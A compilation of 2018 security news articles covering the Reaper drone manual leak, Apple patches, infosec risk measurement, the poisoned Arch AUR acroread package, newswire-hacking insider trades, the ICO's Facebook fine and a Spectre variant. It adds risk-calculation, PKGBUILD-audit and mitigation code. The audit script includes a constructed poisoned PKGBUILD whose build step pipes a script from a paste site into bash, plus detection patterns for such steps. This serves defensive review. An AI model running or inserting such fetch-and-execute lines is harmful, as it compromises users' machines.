STE WILLIAMS

US military manuals hawked on dark web after files left rattling in insecure FTP server

Sensitive US Air Force documents have leaked onto the dark web as part of an attempted sale of drone manuals.

Threat intel firm Recorded Future picked up on an auction for purported export-controlled documents pertaining to the MQ-9 Reaper drone during its regular work monitoring the dark web for criminal activities last month. Recorded Future’s Insikt Group analysts, posing as potential buyers, said they’d engaged the newly registered English-speaking hacker before confirming the validity of the compromised documents.

Further interactions allowed analysts to discover other leaked military information available from the same threat actor. The hacker claimed he had access to a large number of military documents from an unidentified officer.

These documents included a M1 Abrams tank maintenance manual, a tank platoon training course, a crew survival course, and documentation on improvised explosive device mitigation tactics.

Subsequent work revealed that this info was actually pulled from at least one, and more likely a series of, insecure File Transfer Protocol (FTP) servers. “The attacker used a widely known tactic of gaining access to vulnerable Netgear routers with improperly set up FTP login credentials,” Recorded Future said.

Two years ago researchers warned that Netgear routers with remote data access capabilities were susceptible to attack if the default FTP authentication credentials were not updated. Despite the stretch of time, it’s still a common issue. During its research, Recorded Future identified more than 4,000 routers susceptible to attack.

[Image: drone sale dark web market ad. Source: Recorded Future blog post]

Exploitation was far from difficult. Utilising Shodan’s machine data search engine, the hacker scanned large segments of the internet for high-profile misconfigured routers listening on the standard FTP port 21, then hijacked all the valuable documents from the compromised machines.

The hacker first infiltrated the computer of a captain at 432d Aircraft Maintenance Squadron Reaper AMU OIC, stationed at the Creech [Air Force Base] in Nevada, and stole a cache of sensitive documents, including Reaper maintenance course books and the list of airmen assigned to Reaper [Aircraft Maintenance Unit]. While such course books are not classified materials on their own, in unfriendly hands, they could provide an adversary the ability to assess technical capabilities and weaknesses in one of the most technologically advanced aircraft.

The captain, whose computer had seemingly been compromised recently, had completed a cybersecurity awareness course, but he did not set a password for an FTP server hosting sensitive files. This allowed the hacker to easily download the drone manuals, said the researchers. The precise source of the other dozen or so manuals the hacker offered for sale remains undetermined.

“The source was never disclosed to Recorded Future. However, judging by the content, they appear to be stolen from the Pentagon or from a US Army official.”

The hacker let slip that he was also in the habit of watching sensitive live footage from border surveillance cameras and airplanes. “The actor was even bragging about accessing footage from a MQ-1 Predator flying over Choctawhatchee Bay in the Gulf of Mexico.”

Researchers identified the “name and country of residence” of an individual associated with a group they reckon is responsible for the illicit sale of US military manuals. Recorded Future has not identified the country responsible but said that it is continuing to “assist law enforcement in their investigation” of the trade in classified documents.

Early indications suggest a single hacker or small group of associates, rather than organised crime or state-sponsored hackers.

The military response teams will determine the exact ramifications of both breaches. However, the fact that a single hacker with moderate technical skills was able to identify several vulnerable military targets and exfiltrate highly sensitive information in a week’s time is a disturbing preview of what a more determined and organized group with superior technical and financial resources could achieve.

All sorts of bad stuff – including personal information – is hawked through dark web bazaars but classified material is seldom offered. Recorded Future said the latest case is almost unprecedented.

“It is not uncommon to uncover sensitive data like personally identifiable information, login credentials, financial information, and medical records being offered for sale on the dark web. However, it is incredibly rare for criminal hackers to steal and then attempt to sell military documents on an open market.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/11/us_military_manual_dark_net_sale/

Apple Releases Wave of Security Updates

Apple updates software for nearly every hardware platform, though one new feature almost steals the security show.

Apple has released a set of updates to its operating system across its range of hardware, from the Apple Watch to the Mac. While the updates cover a number of issues, a USB attack and its prevention may be the most important among them.

The mass release isn’t unusual behavior for Apple, says Thomas Reed, director of Mac and mobile at Malwarebytes Labs. “When Apple releases these updates, they tend to release one for each of their products,” Reed says. “They’ll release a whole bunch of these on the same date.”

Apparent from an inspection of the issues addressed in the MacOS update is that companies continue to deal with fallout from the Meltdown and Spectre vulnerabilities. On the website announcing the updates, Apple describes one vulnerability in which “… one process may infer register values of other processes through a speculative execution side channel that infers their value.” This could be the broad description of the entire family of Meltdown vulnerabilities.

Reed describes most of the remaining updates as important but not particularly unusual. One, though, has seen a great deal of attention from analysts and law enforcement officials: USB Restricted Mode.

USB Restricted Mode is a new feature that prevents data from being downloaded from an iOS device unless the device has been unlocked within the past hour. The new restriction seems targeted against devices like the GreyLock, which law enforcement agencies have purchased and used to conduct forensic analysis on iPhones and iPads.

“Companies don’t want to make things harder specifically for law enforcement, but we’ve seen these devices being used by bad actors or bad governments,” Reed says. At the same time, he notes a limitation in the restriction: “I don’t understand why they didn’t just make it so you have to unlock the device every time, rather than having the one-hour limit.”

That one-hour window in which data can be downloaded from the device has been seized on by analysts and journalists as a significant flaw in the protection. Oleg Afonin, who blogs at Elcomsoft.com, explains that plugging an accessory (just about any accessory, at that) into the Lightning jack during the one-hour window can easily extend the window of vulnerability indefinitely.

While Afonin’s tests showed that USB Restricted Mode operates as planned in most cases – holding the ports closed through reboots and protecting the device from unauthorized data exfiltration – the ability to work around the mode with a simple accessory is a critical weakness.

Even with this limitation, Reed says that applying the updates and patches is critical for the security of all affected Apple devices. “The more important thing for people to know about the updates is just how important it is to install them,” he says. And the reason is one of the paradoxical qualities of software patching.

“Just as soon as they’re out there, the information on what was patched is published, and hackers have a clue about how they could hack people with the older systems,” Reed explains. “It’s almost like the update makes the older systems even more vulnerable.”

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and …

Article source: https://www.darkreading.com/operations/apple-releases-wave-of-security-updates/d/d-id/1332268?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

What We Talk about When We Talk about Risk

Measuring security risk is not that hard if you get your terms straight and leverage well-established methods and principles from other disciplines.

How enthusiastic would you be to ride on a spacecraft if you knew that the scientists and engineers who designed it and planned the mission couldn’t agree on the definition of mass, weight, and velocity?

A quick look at the word “risk” in Wikipedia provides a clue regarding the variety of definitions that exist for a foundational term in our profession. But inconsistent formal definitions are really just the tip of the iceberg. For example, I like to ask audiences, “Which of these are risks?”:

  • Vulnerabilities
  • Disgruntled employees
  • Reputation
  • Untested recovery plans
  • Sensitive consumer information
  • Weak passwords
  • Cybercriminals

Almost without exception, the answer I hear is “All of them!” The truth, however, is that none of them are risks. Vulnerabilities are not risks and we need to stop acting like they are. Disgruntled employees and cybercriminals are threat communities; reputation and sensitive consumer information are assets; and weak passwords and an untested recovery plan are (deficient) controls. In other words, although these are all parts of the risk landscape, they are importantly different from one another.

Furthermore, when I asked an audience of seasoned infosec professionals to list the top three risks their organizations faced, the following word cloud resulted:

[Image: word cloud of the audience’s “top three risks”. Source: Jack Jones]

I find “unknown” to be particularly ironic.

Why does it matter? Can’t we usually glean the meaning of a term through the context in which it’s being used? Although that’s often true in conversation with colleagues in our profession, clarity is crucial when we’re speaking with people outside of our profession — such as executives — and when we’re trying to measure something. I’ll touch on measurement in a minute. For now, let’s focus on communication.

As a profession, we’ve been saying for a long time that we need to speak the language of business in order to get and maintain the support we need to be effective. That being the case, it’s only logical that our use of the word “risk” be driven by how executives think about it.

What senior executives and boards want from us is to help their organizations manage the frequency and magnitude of infosec-related loss events. These loss events are the “risks” we’re supposed to manage. This is aligned with the rest of their risk world, and it also enables far more effective measurement and communication. A couple of example infosec risks are:

  • Cybercriminal compromise of consumer personal data
  • Disgruntled employee crashing a system that supports a critical business process

The same executive stakeholders whose eyes glaze over when we talk about vulnerabilities and threat vectors suddenly take interest when the risks we talk about are loss events. These risks also provide the context in which we can measure and express the significance of problems in the risk landscape like changes in threat vectors or the vulnerabilities we’re trying to resolve.

Imagine, for example, being able to explain to an executive how a change in threat activity increases the likelihood of the compromise of personally identifiable information by somewhere between 20% and 30%, with a resulting increase in loss exposure of between $500,000 and $1 million. No executive in the world is going to have difficulty wrapping their mind around that.

Of course, that raises the question, “Can we measure infosec risk?” The short answer, despite what you may have heard or believe, is yes. In fact, we do it all the time.

Measurement is a prerequisite to prioritization, and you and I both know that we prioritize all the time. Unfortunately, given the inconsistency and ambiguity with which we approach infosec risk, we’re horrible at it. Here’s some bad news: 70% to 90% of the “high risks” I’ve examined in organizations over the past several years do not, in fact, represent high risk. This means that those organizations have a significant signal-to-noise problem and aren’t able to focus on the things that matter most. And if you think about it, the inability to prioritize effectively is a gift to the bad actors (as if they didn’t already have enough advantages) and a failure on our part as stewards of the resources we’re given.

The good news is that measuring infosec risk is not that hard once you’ve gotten your terms straight and when you leverage well-established methods and principles from other risk disciplines. Good sources of information on this include:

  • How to Measure Anything in Cybersecurity Risk by Douglas W. Hubbard and Richard Seiersen
  • Measuring and Managing Information Risk: A FAIR Approach by Jack Jones and Jack Freund
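The article’s argument is that a risk is a loss event with a frequency and a magnitude, and that both can be measured as ranges. As an added example (not from the article or the books it cites), the sketch below follows the FAIR-style decomposition loss exposure = loss event frequency × loss magnitude, takes each input as a calibrated low/most likely/high range, and shows how a 20% to 30% rise in frequency turns into a change in expected annual loss; every number in it is constructed for illustration.

```python
"""
Constructed example of measuring an infosec risk as a loss event.

loss exposure = loss event frequency (events per year) x loss magnitude (loss per event)

Each input is a calibrated (low, most likely, high) range, propagated two ways:
analytically (means) and with a seeded Monte Carlo run for percentiles.
"""
import random
from dataclasses import dataclass


@dataclass(frozen=True)
class Estimate:
    """A calibrated range: the analyst's low, most likely and high values."""
    low: float
    likely: float
    high: float

    def __post_init__(self):
        if not (self.low <= self.likely <= self.high):
            raise ValueError("range must satisfy low <= likely <= high")

    def mean(self) -> float:
        # Mean of the triangular distribution implied by the three points.
        return (self.low + self.likely + self.high) / 3.0

    def sample(self, rng: random.Random) -> float:
        return rng.triangular(self.low, self.high, self.likely)


@dataclass(frozen=True)
class LossEvent:
    """A risk in the article's sense: a named loss event, not a vulnerability or a threat."""
    name: str
    frequency_per_year: Estimate   # how often the loss event is expected to occur
    magnitude_usd: Estimate        # loss each time it occurs

    def expected_annual_loss(self) -> float:
        # Frequency and magnitude are modelled as independent, so E[F*M] = E[F]*E[M].
        return self.frequency_per_year.mean() * self.magnitude_usd.mean()

    def with_frequency_scaled(self, factor: float) -> "LossEvent":
        """The same loss event after a change in threat activity scales its frequency."""
        f = self.frequency_per_year
        return LossEvent(self.name,
                         Estimate(f.low * factor, f.likely * factor, f.high * factor),
                         self.magnitude_usd)

    def simulate_annual_loss(self, trials: int = 20_000, seed: int = 7) -> list:
        """Monte Carlo: sample frequency and magnitude per trial, return sorted annual losses."""
        rng = random.Random(seed)
        losses = [self.frequency_per_year.sample(rng) * self.magnitude_usd.sample(rng)
                  for _ in range(trials)]
        return sorted(losses)


def percentile(sorted_values: list, pct: float) -> float:
    """Nearest-rank percentile of an already sorted list."""
    rank = int(round(pct / 100.0 * (len(sorted_values) - 1)))
    return sorted_values[rank]


def exposure_change(event: LossEvent, low_factor: float, high_factor: float) -> tuple:
    """Change in expected annual loss when frequency rises by between the two factors."""
    base = event.expected_annual_loss()
    return (event.with_frequency_scaled(low_factor).expected_annual_loss() - base,
            event.with_frequency_scaled(high_factor).expected_annual_loss() - base)


# Constructed inputs: a PII compromise expected roughly once every few years,
# costing between $1M and $6M per event (hypothetical figures).
PII_COMPROMISE = LossEvent(
    name="Cybercriminal compromise of consumer personal data",
    frequency_per_year=Estimate(0.10, 0.25, 0.55),
    magnitude_usd=Estimate(1_000_000, 2_000_000, 6_000_000),
)

if __name__ == "__main__":
    ev = PII_COMPROMISE
    print(f"{ev.name}: expected annual loss ${ev.expected_annual_loss():,.0f}")
    sim = ev.simulate_annual_loss()
    print(f"  simulated 10th/50th/90th percentile: ${percentile(sim, 10):,.0f} / "
          f"${percentile(sim, 50):,.0f} / ${percentile(sim, 90):,.0f}")
    lo, hi = exposure_change(ev, 1.20, 1.30)
    print(f"  a 20-30% rise in frequency adds ${lo:,.0f} to ${hi:,.0f} of expected annual loss")
```

The same structure lets an analyst report the effect of a control change by scaling magnitude instead of frequency.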

Every discipline we think of as mature today — math, medicine, physics, etc. — all went through an early phase in which nobody could agree on fundamental terms or principles. In that sense, we’re in good company. But given today’s imperatives surrounding cyber and technology risk management, we do not have the luxury of decades to get our act together.

Jack Jones is one of the foremost authorities in the field of information risk management. As the Chairman of the FAIR Institute and Executive VP of Research and Development for RiskLens, he continues to lead the way in developing effective and pragmatic ways to manage and …

Article source: https://www.darkreading.com/attacks-breaches/what-we-talk-about-when-we-talk-about-risk/a/d-id/1332192?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Arch Linux PDF reader package poisoned

Arch Linux has pulled a user-provided AUR (Arch User Repository) package, because it contained malware.

If you’re an Arch Linux user who downloaded a PDF viewer named “acroread” in the short time it was compromised, you’ll need to delete it. While the breach isn’t regarded as serious, it sparked a debate about the security of untrusted software.

The user repository included the acroread package, which had been abandoned by its maintainer. Someone using the handle “xeactor” adopted the package and modified it to download malicious scripts from a remote server.

When that was discovered, maintainer Eli Schwartz reverted the commits, suspended xeactor’s account, and discovered (and removed) two other packages with similar modifications.

A later post in the Arch Linux mailing list suggested the “attack” was a warning of another issue. As Bennett Piater wrote: “A script that creates ‘compromised.txt’ in the root and all home folders looks like a warning to me.”

Here’s the code that created the “warning” text file:

for x in /root /home/*; do
        # -w only succeeds if compromised.txt already exists and is writable
        if [[ -w "$x/compromised.txt" ]]; then
                # overwrite the marker file with the collected log
                echo "$FULL_LOG" > "$x/compromised.txt"
        fi
done

The aim of the modified lines in acroread was to use curl to download scripts from a remote site, and the script would (if it worked) reconfigure systemd to restart on a regular basis.

Lending further weight to its status as a warning was another message from Schwartz: “Side note on the acroread pastes: https://ptpb.pw/~x was executed by the PKGBUILD, which in turn executed https://ptpb.pw/~u. But the thing it installed declares an ssupload() function then tries to execute the contents of $uploader to actually upload the data collection.”

Schwartz said that “as-is”, that code wouldn’t work.
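A PKGBUILD is a shell script that makepkg runs on the build machine, so a takeover of the kind described above shows up in the PKGBUILD diff as a build-time download that is executed. As an added example (not from the article or the Arch project), the audit below flags the lines inside the build-time functions that fetch from the network, pipe output into a shell, decode-and-eval content, or write outside the build tree; the two sample PKGBUILDs are constructed, and the paste URL is the one quoted by Eli Schwartz.

```python
"""
Constructed example: a reviewer's check for an AUR PKGBUILD change.
Everything makepkg runs at build time lives in prepare/build/check/package,
so that is where an injected "download and run a script" step has to sit.
"""
import re
from typing import List, NamedTuple

BUILD_FUNCS = {"prepare", "build", "check", "package"}
FUNC_START = re.compile(r"^\s*([A-Za-z_][\w-]*)\s*\(\)\s*\{?\s*$")
FUNC_END = re.compile(r"^\}\s*$")


class Finding(NamedTuple):
    line_no: int
    rule: str
    text: str


RULES = [
    (re.compile(r"\b(curl|wget)\b"),
     "network download at build time (bypasses source= and its checksums)"),
    (re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
     "command output piped into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b|\beval\b"),
     "decoded or eval'd content executed at build time"),
    (re.compile(r"(^|[\s\"'=])/(root|home)(/|\b)"),
     "touches /root or /home (a build should only write under $srcdir/$pkgdir)"),
]


def audit_pkgbuild(text: str) -> List[Finding]:
    """Scan the build-time function bodies of a PKGBUILD and report suspicious lines."""
    findings: List[Finding] = []
    current = None  # name of the function whose body we are inside, if any
    for no, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue
        if current is None:
            m = FUNC_START.match(line)
            if m:
                current = m.group(1)
            continue
        if FUNC_END.match(line):
            current = None
            continue
        if current not in BUILD_FUNCS:
            continue
        for pattern, rule in RULES:
            if pattern.search(line):
                findings.append(Finding(no, rule, line.strip()))
    return findings


def new_findings(before: str, after: str) -> List[Finding]:
    """Findings a change introduces: what the reviewer of a commit should look at first."""
    seen = {(f.rule, f.text) for f in audit_pkgbuild(before)}
    return [f for f in audit_pkgbuild(after) if (f.rule, f.text) not in seen]


# Constructed samples. The poisoned version mimics the change the article describes:
# a package() step that fetches and runs a script from a paste site and drops a marker file.
CLEAN_PKGBUILD = """\
# Maintainer: (example)
pkgname=acroread
pkgver=9.5.5
pkgrel=8
arch=('x86_64')
source=("https://example.invalid/AdbeRdr${pkgver}_i486linux_enu.bin")
sha256sums=('SKIP')

package() {
    cd "$srcdir"
    install -Dm755 acroread "$pkgdir/usr/bin/acroread"
}
"""

POISONED_PKGBUILD = CLEAN_PKGBUILD.replace(
    '    install -Dm755 acroread "$pkgdir/usr/bin/acroread"\n',
    '    install -Dm755 acroread "$pkgdir/usr/bin/acroread"\n'
    '    curl -s https://ptpb.pw/~x | bash\n'
    '    echo "$FULL_LOG" > /root/compromised.txt\n',
)

if __name__ == "__main__":
    for f in new_findings(CLEAN_PKGBUILD, POISONED_PKGBUILD):
        print(f"line {f.line_no}: {f.rule}\n    {f.text}")
```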

Arch’s Giancarlo Razzolini suggested that sounding the alarm over user-provided (and therefore untrusted) AUR packages possibly containing bad code is an overreaction.

“This thread is attracting way more attention than warranted,” he wrote (oh, and now it’s in the media … sorry). “I’m surprised that this type of silly package takeover and malware introduction doesn’t happen more often”, Razzolini added. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/11/someone_modified_arch_linuxs_acrobat_reader_adds_security_warning/

A curious tale of the priest, the broker, the hacked newswires, and $100m of insider trades

Two former investment bankers, one of whom is also a priest, have been found guilty of an elaborate scam – hacking newswires to read press releases prior to publication, and trading millions using this insider information.

Vitaly Korchevsky, formerly a veep at Morgan Stanley and a pastor at the Slavic Evangelical Baptist Church in Philadelphia, USA, and ex-broker Vladislav Khalupsky were this month found guilty of securities fraud by a jury in New York, and are facing 20 years in the slammer.

According to court documents, the two colluded with a Ukrainian hacking gang and investors in the US, Russia, France, and Cyprus to realize more than $100m in illicit profits. America’s financial watchdog, the Securities and Exchange Commission, said it has since recovered $53m of the haul.

The scam, carried out between 2010 and 2015, involved Ukrainian hackers getting into the servers of two unnamed newswire services, one in New York and the other in Canada. The miscreants searched for embargoed press releases on companies’ quarterly financial figures, which are typically privately submitted to a newswire a couple of days before they are published, and accessed more than 100,000 of them before being caught.

In one case, engineering giant Caterpillar sent its 2011 third-quarter results to a newswire, and less than a day later, the gang started trading in its stock. When the figures were published three days later, the shares rose by over $4, netting the miscreants $760,000 in profit.

“Conspiring with hackers overseas, Korchevsky and Khalupsky worked swiftly to trade on stolen press releases, illegally profiting millions of dollars,” said FBI Assistant Director-in-Charge William Sweeney late last week.

“Such a massive criminal operation called for massive cover-ups, but their attempts to cover their tracks were done in vain. Devoting much time to the execution of this sneaky scheme, upon sentencing, the defendants will now rightfully face time in prison.”

The conspirators demonstrated pretty good operational security – compartmentalizing their hardware and wireless hotspots solely for their illegal trading and destroying some equipment to cover their tracks. However, SEC investigators spotted the similarities in multiple trades, and started asking questions.

Khalupsky used his financial knowledge to set up shell companies that allowed investors to use the insider knowledge to take out options on selected shares and profit once the earnings announcements were made. In return, he took a cut of the action and is thought to have made nearly a million dollars in commissions.

Korchevsky, on the other hand, traded for himself and is accused of making $17.5m in illicit profits, most of which has now been seized. Other members of the gang who have been arrested have pleaded guilty, and all parties will be sentenced at a later date. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/11/priest_broker_100m_hack/

Infosec defenders’ supply chain is inferior to black hats, says Carbon Black CEO

The security industry’s supply chain is currently inferior to that of its attackers, says Carbon Black CEO Patrick Morley, but he thinks the industry is finding ways to fight back.

In conversation with The Register yesterday, Morley advanced a theory that exploit brokers, malware authors and other bad actors work together. Security vendors, by contrast, tend to work alone.

“We don’t do as good a job, as defenders,” he said. Matters aren’t helped by miscreants increasingly using “living off the land attacks” that require no malware. Instead they find a way in through tools everyone uses – email or browsers – and then seek out software on an endpoint that can do something nasty. That’s often something with known vulnerabilities, like PDF readers, or something like PowerShell that can pull a machine’s strings.

The evil supply chain works well in such scenarios because one player will create the poison web site, another will sell a zero-day to crack whatever’s found on an endpoint and a third will deliver and harvest the cryptocurrency-mining payload.

Happily, Morley thinks that the industry is starting to network in useful ways that make all players’ wares more effective.

One way that security vendors are fighting back is with the kind of cloudy aggregation Carbon Black already practices. The company not only monitors its users’ endpoints for odd behaviour but combines data from all its clients so that it can look for patterns that represent attacks. The CEO spoke of being able to detect legitimate and malicious use of PowerShell through such analysis of aggregated experiences.

Another is by facilitating networking opportunities for users. Carbon Black’s conferences now include candid sharing sessions at which clients ‘fess up to their security scares. ServiceNow does something similar but in closed forums.

A third is by integrating with other security vendors. While confident in his own products’ protective powers, Morley admitted that he doesn’t have all the answers and that users will benefit from as much information as possible. That belief is why Carbon Black partners with networking and other security software vendors.

Carbon Black is also adding to its own services. The company is currently beta testing “LiveOps”, a tool Morley said makes stateful queries of endpoints and enables users to ask “almost any question I want of an endpoint”, and another called “CB response”, a detection and response tool.

Asked by The Register if the new services suggest Carbon Black could expand into other fields that can benefit from a large pool of anonymised user data, Morley said that he sees multiple uses for the data Carbon Black collects. “The average user has 70 security products,” he said. If Carbon Black can help them to reduce that count by even five, he sees happy days ahead.

He also said that customers will buy into consolidation of the security industry, because a lot of security products were bought without a strategy. With more organisations hiring chief security officers, Morley believes buyers are now looking for platforms, not products. And he’s aiming to be the former. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/11/carbon_black_ceo_patrick_morley_interview/

Infosec bootcamp, tools, exploit code, forensics and more: Get trained at SANS London Sept 2018

Promo Keeping pace with a fast-changing security landscape is becoming an often baffling challenge for many organisations.

Press reports of daring hacking exploits inflicting serious damage on prominent companies have made recruiting security-savvy employees who can detect and prevent intrusions a high priority.

If you are a security professional, SANS London September 2018 promises to deliver immersion training that will arm you with the deep skills you need to defend your organisation from intrusion and keep it safe in the future.

Run by leading security training provider SANS, the event runs 17-22 September at the Grand Connaught Rooms in London, England. An intensive programme of lectures on cutting-edge aspects of cybercrime and security, combined with hands-on lab work, will sharpen your security skills and enable you to gain valuable GIAC specialist certification in your chosen area.

SANS assures attendees that they will be able to bring their newfound skills into play as soon as they return to work.

Course topics include:

  • Security essentials bootcamp style: Do you fully understand why some organisations get compromised? Would you be able to find compromised systems on your network? Do you know the effectiveness of each security device? Are proper security metrics communicated to your executives? Instructor Ian Reynolds’ in-depth bootcamp-style course, reinforced with hands-on lab work, will ensure you can answer these questions with confidence.
  • Hacker tools, techniques, exploits, and incident handling: If your organisation has an internet connection or one or two disgruntled employees, your computer systems will be attacked. Instructor Steve Armstrong provides penetration testing and incident response services for the gaming and music media and has inside knowledge of attackers’ tactics and strategies. Hands-on experience in finding vulnerabilities and discovering intrusions will enable you to discover the holes in your system before the bad guys do.
  • Windows forensic analysis: Government agencies increasingly require media exploitation specialists to recover vital intelligence from the huge amount of data held on Microsoft systems. The course focuses on building digital forensics knowledge of Microsoft Windows 7, Windows 8/8.1, Windows 10 and Windows Server 2008/2012/2016. You will learn how to recover, analyse and authenticate forensic data, track user activity on your network, and organise findings for use in incident response, internal investigations and litigation. Instructors David Cowen and Lee Whitfield have led investigations involving everything from revealing insider threats to intellectual property theft and child exploitation.

More information and registration details here.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/11/sans_london_september_2018_cyber_security_training/

England versus Facebook – score currently stands at £500,000-nil

It’s the hot story right now in Europe…

…no, we’re not talking about the news that France just dumped neighbours Belgium out of the World Series with a 1-0 victory. [Surely you mean the World Cup? – Ed.]

We’re talking about the widespread media coverage that the UK Information Commissioner’s Office (ICO) intends to fine Facebook £500,000 (about $660,000) over the Cambridge Analytica fiasco:

[The ICO intends] to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.

Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.

The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.

Cambridge Analytica (CA) – in case you missed the saga as it uncoiled itself earlier this year – was a web analytics company started by a group of researchers with connections to Cambridge University in the UK.

Put web analytics together with the word Cambridge and you get the cool-sounding name Cambridge Analytica.

What seems to have started as some sort of academic research project soon morphed into a commercial enterprise that allowed participants to take psychometric tests via a Facebook app.

(Facebook apps are essentially plugins for the Facebook platform rather than applications in the traditional sense.)

The sneaky? bait-and-switchy? sleight-of-hand? devious? obvious-with-hindsight? why was anyone surprised? [delete as inappropriate] trick employed in the CA app was that the app explicitly asked you to give it access to account data that wasn’t available by default.

Notably, Cambridge Analytica acquired access to your profile, including a list of all your friends.

That means not only that the app learned a lot about you, but could associate your own “psychometric profile” with your friends – even if they disapproved of psychometric tests; even if they’d never have agreed themselves; indeed, even if they’d never heard of Cambridge Analytica.

As we explained back in March 2018:

You might well question how 270,000 people signing up for a Facebook personality quiz blossomed into a potential data breach affecting 50 million users [now 87 million users] – nearly 25% of potential US voters.

[…] The app scraped not just test-takers’ private profile data, but also that of their friends. Facebook didn’t disallow such behavior from apps at the time, but such data harvesting was allowed only to improve user experience in the app, not to be sold or used for advertising.

Facebook ultimately kicked CA off its platform, but not before a global brouhaha had erupted over whether the social networking giant ought to have done more to make sure that app developers stuck to both the letter and the spirit of Facebook’s own rules.

The ICO certainly seems to think Facebook could have, and should have, done more to stop Cambridge Analytica getting away with its industrial-scale data harvesting – thus the fine.

What next?

Would the ICO have hit Facebook harder if it could?

The ICO’s own announcement makes a point of mentioning that, even though current GDPR rules could in theory have led to a very much bigger fine, “due to the timing of certain incidents in this investigation, civil monetary penalties have to be issued under the previous legislation, the Data Protection Act 1998.”

The maximum financial penalty in civil cases under pre-GDPR laws is £500,000 – and that’s the amount the ICO chose.

Will Facebook pay up?

The ICO’s “fine” is currently only a Notice of Intent, so Facebook still has the right of reply.

Will we all be more careful with apps and plugins in future?

Let’s hope so – remember our simple rule: IF IN DOUBT, DON’T GIVE IT OUT.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/CKwWlBK3E14/

Another data-leaking Spectre CPU flaw among Intel’s dirty dozen of security bug alerts today

Exclusive Intel will today emit a dozen security alerts for its products – including details of another data-leaking vulnerability within the family of Spectre CPU flaws.

This bundle of disclosures is the start of the processor giant’s efforts to move to a quarterly cadence of updates, we understand. Rather than drop surprise alerts onto its security advisory page at irregular intervals, Intel hopes to gradually adopt a routine similar to Microsoft’s monthly Patch Tuesday, albeit once every three months.

Urgent security updates will be pushed out in between these quarterly batches. Some fixes may be emitted outside of this quarterly cadence if they are due to be released on a specific date in a coordinated disclosure with other organizations, and that date falls outside Intel’s schedule.

Motherboard manufacturers, computer makers, operating system developers, and other Intel partners, will privately get a long heads up before these quarterly updates are made public. For instance, today’s patches were shared with manufacturers in March, allowing them to prepare to roll out fixes to customers.

From what we understand, Intel hopes to give folks – from IT administrators to ordinary netizens – time and notice to plan for installing security updates at regular-ish intervals, rather than relying on them to look out for sporadic patches.

Speculative execution continues to haunt

The new Spectre-class side-channel vulnerability in Intel’s processors, to be disclosed today, can be exploited in a bounds-check bypass store attack. This means malicious code already running on an Intel-powered computer can potentially extract passwords, cryptographic keys, and other sensitive information, from other running software threads by altering the flow of speculative execution.

Despite the word “store” in the attack, no actual code or data in memory is altered. However, as far as the CPU’s speculative execution engine is concerned, function pointers and return addresses are overwritten in the attack, allowing the malicious code to change the CPU’s course, and infer the contents of memory that should be out of reach.

This can be done by speculatively overwriting variables and other temporary values, or by speculatively overrunning buffers by tricking the processor into speculatively executing more iterations of a loop than anticipated. Even memory that should be read-only can be speculatively written to in order to potentially perform side-channel extraction of data. Vulnerable code can be as trivial as…

uint8_t buffer[256];   /* 256-byte destination buffer */
const uint8_t *src;    /* source pointer, assumed to point at 256 readable bytes */
int i;

/* The CPU may speculatively run past i == 255 before the compare resolves,
   writing beyond the buffer on the speculative path. */
for (i = 0; i < 256; i++)
  buffer[i] = *src++;

More technical information on bounds-check bypass store attacks can be found here, in section 2.2.1, and here, in a paper out today by Vladimir Kiriansky and Carl Waldspurger.

The good news is that software mitigations available today for Spectre variant 1 will thwart bounds-check bypass store attacks. Thus, web browsers and other applications employing anti-Spectre mechanisms should be safe.

For programmers and compiler writers, this means slipping LFENCE instructions into code, before it reads from memory, to act as a barrier, or clipping array bounds using a bitmask, as described here, in section four.
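The bitmask clipping the article mentions, written out as an added example (not Intel's or the paper's code): a branchless mask that clamps an array index into range even on a mis-speculated path, plus a copy routine that applies it. The SPEC_BARRIER macro and the function names are this example's own choices; the barrier expands to LFENCE only on x86-64 with GCC or Clang.

```c
#include <stddef.h>
#include <stdint.h>
#include <limits.h>

#define SIZE_BITS (sizeof(size_t) * CHAR_BIT)

/* Speculation barrier: LFENCE on x86-64 with GCC/Clang, a no-op elsewhere.
 * Name chosen for this example; it stands in for the LFENCE the text describes. */
#if defined(__x86_64__) && (defined(__GNUC__) || defined(__clang__))
#  define SPEC_BARRIER() __builtin_ia32_lfence()
#else
#  define SPEC_BARRIER() ((void)0)
#endif

/* Branchless mask: all ones when idx < size, zero otherwise. Pure arithmetic
 * on the operands, so there is no compare-and-branch for the CPU to
 * mispredict; the mask is right even on a speculative path.
 * Assumes size <= SIZE_MAX / 2, which any real buffer satisfies. */
static inline size_t index_mask_nospec(size_t idx, size_t size)
{
    /* top bit of (idx | (size - 1 - idx)) is set exactly when idx >= size */
    size_t oob = (idx | (size - 1 - idx)) >> (SIZE_BITS - 1);
    return (size_t)0 - (oob ^ 1);
}

/* Clamp an index into [0, size): in-bounds indices pass through, anything
 * else becomes 0, so a mis-speculated access lands on a harmless slot. */
static inline size_t clamp_index_nospec(size_t idx, size_t size)
{
    return idx & index_mask_nospec(idx, size);
}

/* Hardened copy: an architectural bound check, a barrier so speculation does
 * not run past it, and every index masked so that even speculative iterations
 * with i >= dst_size cannot leave dst. Returns the number of bytes copied. */
size_t copy_nospec(uint8_t *dst, size_t dst_size, const uint8_t *src, size_t n)
{
    if (n > dst_size)
        return 0;
    SPEC_BARRIER();
    for (size_t i = 0; i < n; i++) {
        size_t idx = clamp_index_nospec(i, dst_size);
        dst[idx] = src[idx];
    }
    return n;
}
```

Compared with the plain loop above, the masked version costs a few ALU operations per iteration rather than a fence per load.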

